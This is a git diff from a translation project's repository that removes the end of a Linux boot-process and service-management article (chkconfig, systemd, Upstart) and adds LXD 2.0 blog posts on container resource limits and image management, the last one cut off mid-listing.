On Red-Hat based systems, full multiuser mode with GUI login. This runlevel is like level 3, but with a GUI login available.
-
-
-
6
-
Reboot the system.
-
-
-
-
-To switch between runlevels, we can simply issue a runlevel change using the init command: init N (where N is one of the runlevels listed above). Please note that this is not the recommended way of taking a running system to a different runlevel because it gives no warning to existing logged-in users (thus causing them to lose work and processes to terminate abnormally).
-
-Instead, the shutdown command should be used to restart the system (which first sends a warning message to all logged-in users and blocks any further logins; it then signals init to switch runlevels); however, the default runlevel (the one the system will boot to) must be edited in the /etc/inittab file first.
-
-For that reason, follow these steps to properly switch between runlevels, As root, look for the following line in /etc/inittab.
-
- id:2:initdefault:
-
-and change the number 2 for the desired runlevel with your preferred text editor, such as vim (described in [How to use vi/vim editor in Linux – Part 2][2] of this series).
-
-Next, run as root.
-
- # shutdown -r now
-
-That last command will restart the system, causing it to start in the specified runlevel during next boot, and will run the scripts located in the /etc/rc[runlevel].d directory in order to decide which services should be started and which ones should not. For example, for runlevel 2 in the following system.
-
-![Change Runlevels in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Change-Runlevels-in-Linux.jpeg)
-
-Change Runlevels in Linux
-
-#### Manage Services using chkconfig ####
-
-To enable or disable system services on boot, we will use [chkconfig command][3] in CentOS / openSUSE and sysv-rc-conf in Debian and derivatives. This tool can also show us what is the preconfigured state of a service for a particular runlevel.
-
-- Read Also: [How to Stop and Disable Unwanted Services in Linux][4]
-
-Listing the runlevel configuration for a service.
-
- # chkconfig --list [service name]
- # chkconfig --list postfix
- # chkconfig --list mysqld
-
-![Listing Runlevel Configuration](http://www.tecmint.com/wp-content/uploads/2014/10/Listing-Runlevel-Configuration.png)
-
-Listing Runlevel Configuration
-
-In the above image we can see that postfix is set to start when the system enters runlevels 2 through 5, whereas mysqld will be running by default for runlevels 2 through 4. Now suppose that this is not the expected behaviour.
-
-For example, we need to turn on mysqld for runlevel 5 as well, and turn off postfix for runlevels 4 and 5. Here’s what we would do in each case (run the following commands as root).
-
-**Enabling a service for a particular runlevel**
-
- # chkconfig --level [level(s)] service on
- # chkconfig --level 5 mysqld on
-
-**Disabling a service for particular runlevels**
-
- # chkconfig --level [level(s)] service off
- # chkconfig --level 45 postfix off
-
-![Enable Disable Services in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Enable-Disable-Services.png)
-
-Enable Disable Services
-
-We will now perform similar tasks in a Debian-based system using sysv-rc-conf.
-
-#### Manage Services using sysv-rc-conf ####
-
-Configuring a service to start automatically on a specific runlevel and prevent it from starting on all others.
-
-1. Let’s use the following command to see what are the runlevels where mdadm is configured to start.
-
- # ls -l /etc/rc[0-6].d | grep -E 'rc[0-6]|mdadm'
-
-![Check Runlevel of Service Running](http://www.tecmint.com/wp-content/uploads/2014/10/Check-Service-Runlevel.png)
-
-Check Runlevel of Service Running
-
-2. We will use sysv-rc-conf to prevent mdadm from starting on all runlevels except 2. Just check or uncheck (with the space bar) as desired (you can move up, down, left, and right with the arrow keys).
-
- # sysv-rc-conf
-
-![SysV Runlevel Config](http://www.tecmint.com/wp-content/uploads/2014/10/SysV-Runlevel-Config.png)
-
-SysV Runlevel Config
-
-Then press q to quit.
-
-3. We will restart the system and run again the command from STEP 1.
-
- # ls -l /etc/rc[0-6].d | grep -E 'rc[0-6]|mdadm'
-
-![Verify Service Runlevel](http://www.tecmint.com/wp-content/uploads/2014/10/Verify-Service-Runlevel.png)
-
-Verify Service Runlevel
-
-In the above image we can see that mdadm is configured to start only on runlevel 2.
-
-### What About systemd? ###
-
-systemd is another service and system manager that is being adopted by several major Linux distributions. It aims to allow more processing to be done in parallel during system startup (unlike sysvinit, which always tends to be slower because it starts processes one at a time, checks whether one depends on another, and waits for daemons to launch so more services can start), and to serve as a dynamic resource management to a running system.
-
-Thus, services are started when needed (to avoid consuming system resources) instead of being launched without a solid reason during boot.
-
-Viewing the status of all the processes running on your system, both systemd native and SysV services, run the following command.
-
- # systemctl
-
-![Check All Running Processes in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Check-All-Running-Processes.png)
-
-Check All Running Processes
-
-The LOAD column shows whether the unit definition (refer to the UNIT column, which shows the service or anything maintained by systemd) was properly loaded, while the ACTIVE and SUB columns show the current status of such unit.
-Displaying information about the current status of a service
-
-When the ACTIVE column indicates that an unit’s status is other than active, we can check what happened using.
-
- # systemctl status [unit]
-
-For example, in the image above, media-samba.mount is in failed state. Let’s run.
-
- # systemctl status media-samba.mount
-
-![Check Linux Service Status](http://www.tecmint.com/wp-content/uploads/2014/10/Check-Service-Status.png)
-
-Check Service Status
-
-We can see that media-samba.mount failed because the mount process on host dev1 was unable to find the network share at //192.168.0.10/gacanepa.
-
-### Starting or Stopping Services ###
-
-Once the network share //192.168.0.10/gacanepa becomes available, let’s try to start, then stop, and finally restart the unit media-samba.mount. After performing each action, let’s run systemctl status media-samba.mount to check on its status.
-
- # systemctl start media-samba.mount
- # systemctl status media-samba.mount
- # systemctl stop media-samba.mount
- # systemctl restart media-samba.mount
- # systemctl status media-samba.mount
-
-![Starting Stoping Services](http://www.tecmint.com/wp-content/uploads/2014/10/Starting-Stoping-Service.jpeg)
-
-Starting Stoping Services
-
-**Enabling or disabling a service to start during boot**
-
-Under systemd you can enable or disable a service when it boots.
-
- # systemctl enable [service] # enable a service
- # systemctl disable [service] # prevent a service from starting at boot
-
-The process of enabling or disabling a service to start automatically on boot consists in adding or removing symbolic links in the /etc/systemd/system/multi-user.target.wants directory.
-
-![Enabling Disabling Services](http://www.tecmint.com/wp-content/uploads/2014/10/Enabling-Disabling-Services.jpeg)
-
-Enabling Disabling Services
-
-Alternatively, you can find out a service’s current status (enabled or disabled) with the command.
-
- # systemctl is-enabled [service]
-
-For example,
-
- # systemctl is-enabled postfix.service
-
-In addition, you can reboot or shutdown the system with.
-
- # systemctl reboot
- # systemctl shutdown
-
-### Upstart ###
-
-Upstart is an event-based replacement for the /sbin/init daemon and was born out of the need for starting services only, when they are needed (also supervising them while they are running), and handling events as they occur, thus surpassing the classic, dependency-based sysvinit system.
-
-It was originally developed for the Ubuntu distribution, but is used in Red Hat Enterprise Linux 6.0. Though it was intended to be suitable for deployment in all Linux distributions as a replacement for sysvinit, in time it was overshadowed by systemd. On February 14, 2014, Mark Shuttleworth (founder of Canonical Ltd.) announced that future releases of Ubuntu would use systemd as the default init daemon.
-
-Because the SysV startup script for system has been so common for so long, a large number of software packages include SysV startup scripts. To accommodate such packages, Upstart provides a compatibility mode: It runs SysV startup scripts in the usual locations (/etc/rc.d/rc?.d, /etc/init.d/rc?.d, /etc/rc?.d, or a similar location). Thus, if we install a package that doesn’t yet include an Upstart configuration script, it should still launch in the usual way.
-
-Furthermore, if we have installed utilities such as [chkconfig][5], you should be able to use them to manage your SysV-based services just as we would on sysvinit based systems.
-
-Upstart scripts also support starting or stopping services based on a wider variety of actions than do SysV startup scripts; for example, Upstart can launch a service whenever a particular hardware device is attached.
-
-A system that uses Upstart and its native scripts exclusively replaces the /etc/inittab file and the runlevel-specific SysV startup script directories with .conf scripts in the /etc/init directory.
-
-These *.conf scripts (also known as job definitions) generally consists of the following:
-
-- Description of the process.
-- Runlevels where the process should run or events that should trigger it.
-- Runlevels where process should be stopped or events that should stop it.
-- Options.
-- Command to launch the process.
-
-For example,
-
- # My test service - Upstart script demo description "Here goes the description of 'My test service'" author "Dave Null "
- # Stanzas
-
- #
- # Stanzas define when and how a process is started and stopped
- # See a list of stanzas here: http://upstart.ubuntu.com/wiki/Stanzas#respawn
- # When to start the service
- start on runlevel [2345]
- # When to stop the service
- stop on runlevel [016]
- # Automatically restart process in case of crash
- respawn
- # Specify working directory
- chdir /home/dave/myfiles
- # Specify the process/command (add arguments if needed) to run
- exec bash backup.sh arg1 arg2
-
-To apply changes, you will need to tell upstart to reload its configuration.
-
- # initctl reload-configuration
-
-Then start your job by typing the following command.
-
- $ sudo start yourjobname
-
-Where yourjobname is the name of the job that was added earlier with the yourjobname.conf script.
-
-A more complete and detailed reference guide for Upstart is available in the project’s web site under the menu “[Cookbook][6]”.
-
-### Summary ###
-
-A knowledge of the Linux boot process is necessary to help you with troubleshooting tasks as well as with adapting the computer’s performance and running services to your needs.
-
-In this article we have analyzed what happens from the moment when you press the Power switch to turn on the machine until you get a fully operational user interface. I hope you have learned reading it as much as I did while putting it together. Feel free to leave your comments or questions below. We always look forward to hearing from our readers!
-
---------------------------------------------------------------------------------
-
-via: http://www.tecmint.com/linux-boot-process-and-manage-services/
-
-作者:[Gabriel Cánepa][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.tecmint.com/author/gacanepa/
-[1]:http://www.tecmint.com/systemd-replaces-init-in-linux/
-[2]:http://www.tecmint.com/vi-editor-usage/
-[3]:http://www.tecmint.com/chkconfig-command-examples/
-[4]:http://www.tecmint.com/remove-unwanted-services-from-linux/
-[5]:http://www.tecmint.com/chkconfig-command-examples/
-[6]:http://upstart.ubuntu.com/cookbook/
diff --git a/sources/tech/LXD/Part 4 - LXD 2.0--Resource control.md b/sources/tech/LXD/Part 4 - LXD 2.0--Resource control.md
new file mode 100644
index 0000000000..736c5b84bc
--- /dev/null
+++ b/sources/tech/LXD/Part 4 - LXD 2.0--Resource control.md
@@ -0,0 +1,408 @@
+ezio is translating
+
+
+Part 4 - LXD 2.0: Resource control
+======================================
+
+This is the fourth blog post [in this series about LXD 2.0][0].
+
+As there are a lot of commands involved with managing LXD containers, this post is rather long. If you’d instead prefer a quick step-by-step tour of those same commands, you can [try our online demo instead][1]!
+
+![](https://linuxcontainers.org/static/img/containers.png)
+
+### Available resource limits
+
+LXD offers a variety of resource limits. Some of those are tied to the container itself, like memory quotas, CPU limits and I/O priorities. Some are tied to a particular device instead, like I/O bandwidth or disk usage limits.
+
+As with all LXD configuration, resource limits can be dynamically changed while the container is running. Some may fail to apply, for example if setting a memory value smaller than the current memory usage, but LXD will try anyway and report back on failure.
+
+All limits can also be inherited through profiles in which case each affected container will be constrained by that limit. That is, if you set limits.memory=256MB in the default profile, every container using the default profile (typically all of them) will have a memory limit of 256MB.
+
+We don’t support resource limits pooling where a limit would be shared by a group of containers, there is simply no good way to implement something like that with the existing kernel APIs.
+
+#### Disk
+
+This is perhaps the most requested and obvious one. Simply setting a size limit on the container’s filesystem and have it enforced against the container.
+
+And that’s exactly what LXD lets you do!
+Unfortunately this is far more complicated than it sounds. Linux doesn’t have path-based quotas, instead most filesystems only have user and group quotas which are of little use to containers.
+
+This means that right now LXD only supports disk limits if you’re using the ZFS or btrfs storage backend. It may be possible to implement this feature for LVM too but this depends on the filesystem being used with it and gets tricky when combined with live updates as not all filesystems allow online growth and pretty much none of them allow online shrink.
+
+#### CPU
+
+When it comes to CPU limits, we support 4 different things:
+
+* Just give me X CPUs
+
+ In this mode, you let LXD pick a bunch of cores for you and then load-balance things as more containers and CPUs go online/offline.
+
+ The container only sees that number of CPU.
+* Give me a specific set of CPUs (say, core 1, 3 and 5)
+
+ Similar to the first mode except that no load-balancing is happening, you’re stuck with those cores no matter how busy they may be.
+* Give me 20% of whatever you have
+
+ In this mode, you get to see all the CPUs but the scheduler will restrict you to 20% of the CPU time but only when under load! So if the system isn’t busy, your container can have as much fun as it wants. When containers next to it start using the CPU, then it gets capped.
+* Out of every measured 200ms, give me 50ms (and no more than that)
+
+ This mode is similar to the previous one in that you get to see all the CPUs but this time, you can only use as much CPU time as you set in the limit, no matter how idle the system may be. On a system without over-commit this lets you slice your CPU very neatly and guarantees constant performance to those containers.
+
+It’s also possible to combine one of the first two with one of the last two, that is, request a set of CPUs and then further restrict how much CPU time you get on those.
+
+On top of that, we also have a generic priority knob which is used to tell the scheduler who wins when you’re under load and two containers are fighting for the same resource.
+
+#### Memory
+
+Memory sounds pretty simple, just give me X MB of RAM!
+
+And it absolutely can be that simple. We support that kind of limits as well as percentage based requests, just give me 10% of whatever the host has!
+
+Then we support some extra stuff on top. For example, you can choose to turn swap on and off on a per-container basis and if it’s on, set a priority so you can choose what container will have their memory swapped out to disk first!
+
+Oh and memory limits are “hard” by default. That is, when you run out of memory, the kernel out of memory killer will start having some fun with your processes.
+
+Alternatively you can set the enforcement policy to “soft”, in which case you’ll be allowed to use as much memory as you want so long as nothing else is. As soon as something else wants that memory, you won’t be able to allocate anything until you’re back under your limit or until the host has memory to spare again.
+
+#### Network I/O
+
+Network I/O is probably our simplest looking limit, trust me, the implementation really isn’t simple though!
+
+We support two things. The first is a basic bit/s limits on network interfaces. You can set a limit of ingress and egress or just set the “max” limit which then applies to both. This is only supported for “bridged” and “p2p” type interfaces.
+
+The second thing is a global network I/O priority which only applies when the network interface you’re trying to talk through is saturated.
+
+#### Block I/O
+
+I kept the weirdest for last. It may look straightforward and feel like that to the user but there are a bunch of cases where it won’t exactly do what you think it should.
+
+What we support here is basically identical to what I described in Network I/O.
+
+You can set IOps or byte/s read and write limits directly on a disk device entry and there is a global block I/O priority which tells the I/O scheduler who to prefer.
+
+The weirdness comes from how and where those limits are applied. Unfortunately the underlying feature we use to implement those uses full block devices. That means we can’t set per-partition I/O limits let alone per-path.
+
+It also means that when using ZFS or btrfs which can use multiple block devices to back a given path (with or without RAID), we effectively don’t know what block device is providing a given path.
+
+This means that it’s entirely possible, in fact likely, that a container may have multiple disk entries (bind-mounts or straight mounts) which are coming from the same underlying disk.
+
+And that’s where things get weird. To make things work, LXD has logic to guess what block devices back a given path, this does include interrogating the ZFS and btrfs tools and even figures things out recursively when it finds a loop mounted file backing a filesystem.
+
+That logic while not perfect, usually yields a set of block devices that should have a limit applied. LXD then records that and moves on to the next path. When it’s done looking at all the paths, it gets to the very weird part. It averages the limits you’ve set for every affected block devices and then applies those.
+
+That means that “in average” you’ll be getting the right speed in the container, but it also means that you can’t have a “/fast” and a “/slow” directory both coming from the same physical disk and with differing speed limits. LXD will let you set it up but in the end, they’ll both give you the average of the two values.
+
+### How does it all work?
+
+Most of the limits described above are applied through the Linux kernel Cgroups API. That’s with the exception of the network limits which are applied through good old “tc”.
+
+LXD at startup time detects what cgroups are enabled in your kernel and will only apply the limits which your kernel support. Should you be missing some cgroups, a warning will also be printed by the daemon which will then get logged by your init system.
+
+On Ubuntu 16.04, everything is enabled by default with the exception of swap memory accounting which requires you pass the “swapaccount=1” kernel boot parameter.
+
+### Applying some limits
+
+All the limits described above are applied directly to the container or to one of its profiles. Container-wide limits are applied with:
+
+```
+lxc config set CONTAINER KEY VALUE
+```
+
+or for a profile:
+
+```
+lxc profile set PROFILE KEY VALUE
+```
+
+while device-specific ones are applied with:
+
+```
+lxc config device set CONTAINER DEVICE KEY VALUE
+```
+
+or for a profile:
+
+```
+lxc profile device set PROFILE DEVICE KEY VALUE
+```
+
+The complete list of valid configuration keys, device types and device keys can be [found here][1].
+
+#### CPU
+
+To just limit a container to any 2 CPUs, do:
+
+```
+lxc config set my-container limits.cpu 2
+```
+
+To pin to specific CPU cores, say the second and fourth:
+
+```
+lxc config set my-container limits.cpu 1,3
+```
+
+More complex pinning ranges like this works too:
+
+```
+lxc config set my-container limits.cpu 0-3,7-11
+```
+
+The limits are applied live, as can be seen in this example:
+
+```
+stgraber@dakara:~$ lxc exec zerotier -- cat /proc/cpuinfo | grep ^proces
+processor : 0
+processor : 1
+processor : 2
+processor : 3
+stgraber@dakara:~$ lxc config set zerotier limits.cpu 2
+stgraber@dakara:~$ lxc exec zerotier -- cat /proc/cpuinfo | grep ^proces
+processor : 0
+processor : 1
+```
+
+Note that to avoid utterly confusing userspace, lxcfs arranges the /proc/cpuinfo entries so that there are no gaps.
+
+As with just about everything in LXD, those settings can also be applied in profiles:
+
+```
+stgraber@dakara:~$ lxc exec snappy -- cat /proc/cpuinfo | grep ^proces
+processor : 0
+processor : 1
+processor : 2
+processor : 3
+stgraber@dakara:~$ lxc profile set default limits.cpu 3
+stgraber@dakara:~$ lxc exec snappy -- cat /proc/cpuinfo | grep ^proces
+processor : 0
+processor : 1
+processor : 2
+```
+
+To limit the CPU time of a container to 10% of the total, set the CPU allowance:
+
+```
+lxc config set my-container limits.cpu.allowance 10%
+```
+
+Or to give it a fixed slice of CPU time:
+
+```
+lxc config set my-container limits.cpu.allowance 25ms/200ms
+```
+
+And lastly, to reduce the priority of a container to a minimum:
+
+```
+lxc config set my-container limits.cpu.priority 0
+```
+
+#### Memory
+
+To apply a straightforward memory limit run:
+
+```
+lxc config set my-container limits.memory 256MB
+```
+
+(The supported suffixes are kB, MB, GB, TB, PB and EB)
+
+To turn swap off for the container (defaults to enabled):
+
+```
+lxc config set my-container limits.memory.swap false
+```
+
+To tell the kernel to swap this container’s memory first:
+
+```
+lxc config set my-container limits.memory.swap.priority 0
+```
+
+And finally if you don’t want hard memory limit enforcement:
+
+```
+lxc config set my-container limits.memory.enforce soft
+```
+
+#### Disk and block I/O
+
+Unlike CPU and memory, disk and I/O limits are applied to the actual device entry, so you either need to edit the original device or mask it with a more specific one.
+
+To set a disk limit (requires btrfs or ZFS):
+
+```
+lxc config device set my-container root size 20GB
+```
+
+For example:
+
+```
+stgraber@dakara:~$ lxc exec zerotier -- df -h /
+Filesystem Size Used Avail Use% Mounted on
+encrypted/lxd/containers/zerotier 179G 542M 178G 1% /
+stgraber@dakara:~$ lxc config device set zerotier root size 20GB
+stgraber@dakara:~$ lxc exec zerotier -- df -h /
+Filesystem Size Used Avail Use% Mounted on
+encrypted/lxd/containers/zerotier 20G 542M 20G 3% /
+```
+
+To restrict speed you can do the following:
+
+```
+lxc config device set my-container root limits.read 30MB
+lxc config device set my-container root.limits.write 10MB
+```
+
+Or to restrict IOps instead:
+
+```
+lxc config device set my-container root limits.read 20Iops
+lxc config device set my-container root limits.write 10Iops
+```
+
+And lastly, if you’re on a busy system with over-commit, you may want to also do:
+
+```
+lxc config set my-container limits.disk.priority 10
+```
+
+To increase the I/O priority for that container to the maximum.
+
+#### Network I/O
+
+Network I/O is basically identical to block I/O as far the knobs available.
+
+For example:
+
+```
+stgraber@dakara:~$ lxc exec zerotier -- wget http://speedtest.newark.linode.com/100MB-newark.bin -O /dev/null
+--2016-03-26 22:17:34-- http://speedtest.newark.linode.com/100MB-newark.bin
+Resolving speedtest.newark.linode.com (speedtest.newark.linode.com)... 50.116.57.237, 2600:3c03::4b
+Connecting to speedtest.newark.linode.com (speedtest.newark.linode.com)|50.116.57.237|:80... connected.
+HTTP request sent, awaiting response... 200 OK
+Length: 104857600 (100M) [application/octet-stream]
+Saving to: '/dev/null'
+
+/dev/null 100%[===================>] 100.00M 58.7MB/s in 1.7s
+
+2016-03-26 22:17:36 (58.7 MB/s) - '/dev/null' saved [104857600/104857600]
+
+stgraber@dakara:~$ lxc profile device set default eth0 limits.ingress 100Mbit
+stgraber@dakara:~$ lxc profile device set default eth0 limits.egress 100Mbit
+stgraber@dakara:~$ lxc exec zerotier -- wget http://speedtest.newark.linode.com/100MB-newark.bin -O /dev/null
+--2016-03-26 22:17:47-- http://speedtest.newark.linode.com/100MB-newark.bin
+Resolving speedtest.newark.linode.com (speedtest.newark.linode.com)... 50.116.57.237, 2600:3c03::4b
+Connecting to speedtest.newark.linode.com (speedtest.newark.linode.com)|50.116.57.237|:80... connected.
+HTTP request sent, awaiting response... 200 OK
+Length: 104857600 (100M) [application/octet-stream]
+Saving to: '/dev/null'
+
+/dev/null 100%[===================>] 100.00M 11.4MB/s in 8.8s
+
+2016-03-26 22:17:56 (11.4 MB/s) - '/dev/null' saved [104857600/104857600]
+```
+
+And that’s how you throttle an otherwise nice gigabit connection to a mere 100Mbit/s one!
+
+And as with block I/O, you can set an overall network priority with:
+
+```
+lxc config set my-container limits.network.priority 5
+```
+
+### Getting the current resource usage
+
+The [LXD API][2] exports quite a bit of information on current container resource usage, you can get:
+
+* Memory: current, peak, current swap and peak swap
+* Disk: current disk usage
+* Network: bytes and packets received and transferred for every interface
+
+And now if you’re running a very recent LXD (only in git at the time of this writing), you can also get all of those in “lxc info”:
+
+```
+stgraber@dakara:~$ lxc info zerotier
+Name: zerotier
+Architecture: x86_64
+Created: 2016/02/20 20:01 UTC
+Status: Running
+Type: persistent
+Profiles: default
+Pid: 29258
+Ips:
+ eth0: inet 172.17.0.101
+ eth0: inet6 2607:f2c0:f00f:2700:216:3eff:feec:65a8
+ eth0: inet6 fe80::216:3eff:feec:65a8
+ lo: inet 127.0.0.1
+ lo: inet6 ::1
+ lxcbr0: inet 10.0.3.1
+ lxcbr0: inet6 fe80::f0bd:55ff:feee:97a2
+ zt0: inet 29.17.181.59
+ zt0: inet6 fd80:56c2:e21c:0:199:9379:e711:b3e1
+ zt0: inet6 fe80::79:e7ff:fe0d:5123
+Resources:
+ Processes: 33
+ Disk usage:
+ root: 808.07MB
+ Memory usage:
+ Memory (current): 106.79MB
+ Memory (peak): 195.51MB
+ Swap (current): 124.00kB
+ Swap (peak): 124.00kB
+ Network usage:
+ lxcbr0:
+ Bytes received: 0 bytes
+ Bytes sent: 570 bytes
+ Packets received: 0
+ Packets sent: 0
+ zt0:
+ Bytes received: 1.10MB
+ Bytes sent: 806 bytes
+ Packets received: 10957
+ Packets sent: 10957
+ eth0:
+ Bytes received: 99.35MB
+ Bytes sent: 5.88MB
+ Packets received: 64481
+ Packets sent: 64481
+ lo:
+ Bytes received: 9.57kB
+ Bytes sent: 9.57kB
+ Packets received: 81
+ Packets sent: 81
+Snapshots:
+ zerotier/blah (taken at 2016/03/08 23:55 UTC) (stateless)
+```
+
+### Conclusion
+
+The LXD team spent quite a few months iterating over the language we’re using for those limits. It’s meant to be as simple as it can get while remaining very powerful and specific when you want it to.
+
+Live application of those limits and inheritance through profiles makes it a very powerful tool to live manage the load on your servers without impacting the running services.
+
+### Extra information
+
+The main LXD website is at:
+Development happens on Github at:
+Mailing-list support happens on:
+IRC support happens in: #lxcontainers on irc.freenode.net
+
+And if you don’t want or can’t install LXD on your own machine, you can always [try it online instead][3]!
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.stgraber.org/2016/03/26/lxd-2-0-resource-control-412/
+
+作者:[Stéphane Graber][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://www.stgraber.org/author/stgraber/
+[0]: https://www.stgraber.org/2016/03/11/lxd-2-0-blog-post-series-012/
+[1]: https://github.com/lxc/lxd/blob/master/doc/configuration.md
+[2]: https://github.com/lxc/lxd/blob/master/doc/rest-api.md
+[3]: https://linuxcontainers.org/lxd/try-it
diff --git a/sources/tech/LXD/Part 5 - LXD 2.0--Image management.md b/sources/tech/LXD/Part 5 - LXD 2.0--Image management.md
new file mode 100644
index 0000000000..1e2e9ace01
--- /dev/null
+++ b/sources/tech/LXD/Part 5 - LXD 2.0--Image management.md
@@ -0,0 +1,458 @@
+Part 5 - LXD 2.0: Image management
+==================================
+This is the fifth blog post [in this series about LXD 2.0][0].
+
+As there are a lot of commands involved with managing LXD containers, this post is rather long. If you’d instead prefer a quick step-by-step tour of those same commands, you can [try our online demo instead][1]!
+
+![](https://linuxcontainers.org/static/img/containers.png)
+
+### Container images
+
+If you’ve used LXC before, you probably remember those LXC “templates”, basically shell scripts that spit out a container filesystem and a bit of configuration.
+
+Most templates generate the filesystem by doing a full distribution bootstrapping on your local machine. This may take quite a while, won’t work for all distributions and may require significant network bandwidth.
+
+Back in LXC 1.0, I wrote a “download” template which would allow users to download pre-packaged container images, generated on a central server from the usual template scripts and then heavily compressed, signed and distributed over https. A lot of our users switched from the old style container generation to using this new, much faster and much more reliable method of creating a container.
+
+With LXD, we’re taking this one step further by being all-in on the image based workflow. All containers are created from an image and we have advanced image caching and pre-loading support in LXD to keep the image store up to date.
+
+### Interacting with LXD images
+
+Before digging deeper into the image format, lets quickly go through what LXD lets you do with those images.
+
+#### Transparently importing images
+
+All containers are created from an image. The image may have come from a remote image server and have been pulled using its full hash, short hash or an alias, but in the end, every LXD container is created from a local image.
+
+Here are a few examples:
+
+```
+lxc launch ubuntu:14.04 c1
+lxc launch ubuntu:75182b1241be475a64e68a518ce853e800e9b50397d2f152816c24f038c94d6e c2
+lxc launch ubuntu:75182b1241be c3
+```
+
+All of those refer to the same remote image (at the time of this writing), the first time one of those is run, the remote image will be imported in the local LXD image store as a cached image, then the container will be created from it.
+
+The next time one of those commands are run, LXD will only check that the image is still up to date (when not referring to it by its fingerprint), if it is, it will create the container without downloading anything.
+
+Now that the image is cached in the local image store, you can also just start it from there without even checking if it’s up to date:
+
+```
+lxc launch 75182b1241be c4
+```
+
+And lastly, if you have your own local image under the name “myimage”, you can just do:
+
+```
+lxc launch my-image c5
+```
+
+If you want to change some of that automatic caching and expiration behavior, there are instructions in an earlier post in this series.
+
+#### Manually importing images
+
+##### Copying from an image server
+
+If you want to copy some remote image into your local image store but not immediately create a container from it, you can use the “lxc image copy” command. It also lets you tweak some of the image flags, for example:
+
+```
+lxc image copy ubuntu:14.04 local:
+```
+
+This simply copies the remote image into the local image store.
+
+If you want to be able to refer to your copy of the image by something easier to remember than its fingerprint, you can add an alias at the time of the copy:
+
+```
+lxc image copy ubuntu:12.04 local: --alias old-ubuntu
+lxc launch old-ubuntu c6
+```
+
+And if you would rather just use the aliases that were set on the source server, you can ask LXD to copy the for you:
+
+lxc image copy ubuntu:15.10 local: --copy-aliases
+lxc launch 15.10 c7
+All of the copies above were one-shot copy, so copying the current version of the remote image into the local image store. If you want to have LXD keep the image up to date, as it does for the ones stored in its cache, you need to request it with the `–auto-update` flag:
+
+```
+lxc image copy images:gentoo/current/amd64 local: --alias gentoo --auto-update
+```
+
+##### Importing a tarball
+
+If someone provides you with a LXD image as a single tarball, you can import it with:
+
+```
+lxc image import
+```
+
+If you want to set an alias at import time, you can do it with:
+
+```
+lxc image import --alias random-image
+```
+
+Now if you were provided with two tarballs, identify which contains the LXD metadata. Usually the tarball name gives it away, if not, pick the smallest of the two, metadata tarballs are tiny. Then import them both together with:
+
+```
+lxc image import
+```
+
+##### Importing from a URL
+
+“lxc image import” also works with some special URLs. If you have an https web server which serves a path with the LXD-Image-URL and LXD-Image-Hash headers set, then LXD will pull that image into its image store.
+
+For example you can do:
+
+```
+lxc image import https://dl.stgraber.org/lxd --alias busybox-amd64
+```
+
+When pulling the image, LXD also sets some headers which the remote server could check to return an appropriate image. Those are LXD-Server-Architectures and LXD-Server-Version.
+
+This is meant as a poor man’s image server. It can be made to work with any static web server and provides a user friendly way to import your image.
+
+#### Managing the local image store
+
+Now that we have a bunch of images in our local image store, lets see what we can do with them. We’ve already covered the most obvious, creating containers from them but there are a few more things you can do with the local image store.
+
+##### Listing images
+
+To get a list of all images in the store, just run “lxc image list”:
+
+```
+stgraber@dakara:~$ lxc image list
++---------------+--------------+--------+------------------------------------------------------+--------+----------+------------------------------+
+| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
++---------------+--------------+--------+------------------------------------------------------+--------+----------+------------------------------+
+| alpine-32 | 6d9c131efab3 | yes | Alpine edge (i386) (20160329_23:52) | i686 | 2.50MB | Mar 30, 2016 at 4:36am (UTC) |
++---------------+--------------+--------+------------------------------------------------------+--------+----------+------------------------------+
+| busybox-amd64 | 74186c79ca2f | no | Busybox x86_64 | x86_64 | 0.79MB | Mar 30, 2016 at 4:33am (UTC) |
++---------------+--------------+--------+------------------------------------------------------+--------+----------+------------------------------+
+| gentoo | 1a134c5951e0 | no | Gentoo current (amd64) (20160329_14:12) | x86_64 | 232.50MB | Mar 30, 2016 at 4:34am (UTC) |
++---------------+--------------+--------+------------------------------------------------------+--------+----------+------------------------------+
+| my-image | c9b6e738fae7 | no | Scientific Linux 6 x86_64 (default) (20160215_02:36) | x86_64 | 625.34MB | Mar 2, 2016 at 4:56am (UTC) |
++---------------+--------------+--------+------------------------------------------------------+--------+----------+------------------------------+
+| old-ubuntu | 4d558b08f22f | no | ubuntu 12.04 LTS amd64 (release) (20160315) | x86_64 | 155.09MB | Mar 30, 2016 at 4:30am (UTC) |
++---------------+--------------+--------+------------------------------------------------------+--------+----------+------------------------------+
+| w (11 more) | d3703a994910 | no | ubuntu 15.10 amd64 (release) (20160315) | x86_64 | 153.35MB | Mar 30, 2016 at 4:31am (UTC) |
++---------------+--------------+--------+------------------------------------------------------+--------+----------+------------------------------+
+| | 75182b1241be | no | ubuntu 14.04 LTS amd64 (release) (20160314) | x86_64 | 118.17MB | Mar 30, 2016 at 4:27am (UTC) |
++---------------+--------------+--------+------------------------------------------------------+--------+----------+------------------------------+
+```
+
+You can filter based on the alias or fingerprint simply by doing:
+
+```
+stgraber@dakara:~$ lxc image list amd64
++---------------+--------------+--------+-----------------------------------------+--------+----------+------------------------------+
+| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
++---------------+--------------+--------+-----------------------------------------+--------+----------+------------------------------+
+| busybox-amd64 | 74186c79ca2f | no | Busybox x86_64 | x86_64 | 0.79MB | Mar 30, 2016 at 4:33am (UTC) |
++---------------+--------------+--------+-----------------------------------------+--------+----------+------------------------------+
+| w (11 more) | d3703a994910 | no | ubuntu 15.10 amd64 (release) (20160315) | x86_64 | 153.35MB | Mar 30, 2016 at 4:31am (UTC) |
++---------------+--------------+--------+-----------------------------------------+--------+----------+------------------------------+
+```
+
+Or by specifying a key=value filter of image properties:
+
+```
+stgraber@dakara:~$ lxc image list os=ubuntu
++-------------+--------------+--------+---------------------------------------------+--------+----------+------------------------------+
